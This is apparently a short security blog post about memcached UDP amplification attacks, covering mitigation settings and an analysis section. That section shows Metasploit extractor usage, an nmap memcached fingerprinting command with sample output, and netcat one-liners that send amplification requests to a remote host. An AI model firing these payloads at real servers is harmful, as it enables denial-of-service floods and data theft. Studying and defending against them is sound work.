메뉴 건너뛰기

메리메리쩜넷넷

Contents

Memcached Stuff

Kevin 2018.03.01 19:27 조회 수 : 410

1. Overview

1.1. (US-CERT) UDP-Based Amplification Attacks

(2018. Feb. 28. revised)

https://www.us-cert.gov/ncas/alerts/TA14-017A

UDP-Based Amplification Attacks.JPG

 

1.2. Reflectors

stats_proving.JPG

 

1.3. Reflection Attack Vector

memcached.png

 

 

2. Mitigation

2.1. Ensure that memcached servers are configured to use industry-standard best current practices (BCP). This includes:

*using source-address validation to filter ingress traffic (BCP38/BCP84)

*using access control lists (ACL) to restrict source IP addresses/ports and limit traffic.

 

2.2. Change the memcached configuration setting for CACHESIZE and -l :

Open /etc/memcached.conf in a text editor.

Locate the -m parameter.

Change its value to at least 1GB.

Locate the -l parameter.

Change its value to 127.0.0.1 or localhost.

Save your changes to memcached.conf and exit the text editor.

Restart memcached.

 

2.3. Binding localhost only

Blocking port 11211 in your firewall is a good first step. For memcached users, If UDP is not used in your deployment, you can disable the feature with the switch -U 0. Otherwise, limiting access to localhost with the switch —listen 127.0.0.1 is advisable.

 

3. Analysis

3.1. memcached nse

https://nmap.org/nsedoc/scripts/memcached-info.html

 

3.2. memcache hacking tool (blackhat usa)

https://github.com/sensepost/go-derper

 

3.3. memcached metasploit module

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/misc/memcached.rb

 

3.4. memcached extractor usage

      msf > use auxiliary/gather/memcached_extractor
      msf auxiliary(memcached_extractor) > show actions
            ...actions...
      msf auxiliary(memcached_extractor) > set ACTION <action-name>
      msf auxiliary(memcached_extractor) > show options
            ...show and set options...
      msf auxiliary(memcached_extractor) > run

 

3.5. grabbing info

$ sudo nmap $TARGET -p 11211 -sU -sS --script memcached-info

Starting Nmap 7.50SVN ( https://nmap.org ) at 2018-03-02 11:51 KST

Failed to resolve "TARGET".

Nmap scan report for xx.xx.xx.xx

Host is up (0.015s latency).

 

PORT      STATE         SERVICE

11211/tcp open          memcache

| memcached-info:

|   Process ID           18120

|   Uptime               2665702 seconds

|   Server time          2018-03-02T02:51:13

|   Architecture         64 bit

|   Used CPU (user)      252.545607

|   Used CPU (system)    982.822588

|   Current connections  5

|_  Total connections    19883412

11211/udp open|filtered memcache

 

3.6. simulate amplification for remotehost

python -c "print '\0\x01\0\0\0\x01\0\0gets a b c d e f g h j k l m n o p q r s t w v u x y a\r\n'" |nc -nvvu xx.xx.xx.xx 11211 >/tmp/null

request.JPG

 

response.JPG

The responded data size was 4,238 times of requested. (requested: 107 bytes, reponded 453,564 bytes)

 
3.7. simulate amplification for localhost
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211
 
 
번호 제목 글쓴이 날짜 조회 수
» Memcached Stuff file Kevin 2018.03.01 410
1 IoT Malware (cross platform) file Kevin 2018.01.14 870
위로